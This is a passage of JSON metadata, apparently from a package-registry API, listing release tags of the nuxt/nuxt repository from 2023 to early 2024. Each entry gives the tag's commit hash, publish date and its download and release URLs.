ncies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"@nuxt/ui-templates@1.3.1","sha":"26a0745b9cc3a60aa8bf86c74ab3ff7ec4717058","kind":"tag","published_at":"2023-07-29T03:33:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1/manifests"},{"name":"@nuxt/ui-templates@1.3.0","sha":"039126dac7070eeae2eae16fcb423f6b77a4fc0d","kind":"tag","published_at":"2023-07-28T16:37:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0/manifests"},{"name":"@nuxt/ui-templates@1.2.1","sha":"57e237b03ecb63319727dd407f01be6c6540deab","kind":"tag","published_at":"2023-07-26T09:19:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"@nuxt/ui-templates@1.2.0","sha":"5f6e505ea476ed8ede4edbd4d1fb3dcae0189705","kind":"tag","published_at":"2023-06-20T11:29:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.1/manifests"},{"name":"v3.2.0","sha":"5855c1ed53ae1336fcfeb118a27c7201a9b83949","kind":"commit","published_at":"2023-02-09T10:55:03.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.0/manifests"},{"name":"v3.1.2","sha":"225988ebd56aedf831b37bfce293ba76814ddb59","kind":"commit","published_at":"2023-02-03T12:56:51.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.1.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.1.2/manifests"},{"name":"v2.16.0","sha":"6dc6cef9abd17346498d41572dd47a4fd99c900d","kind":"tag","published_at":"2023-02-03T12:48:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.0/manifests"},{"name":"@nuxt/ui-templates@1.1.1","sha":"537c50b7b9c35753c69786e23b14b0a8ee8af112","kind":"tag","published_at":"2023-01-31T14:49:44.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.1.1","tag_url":"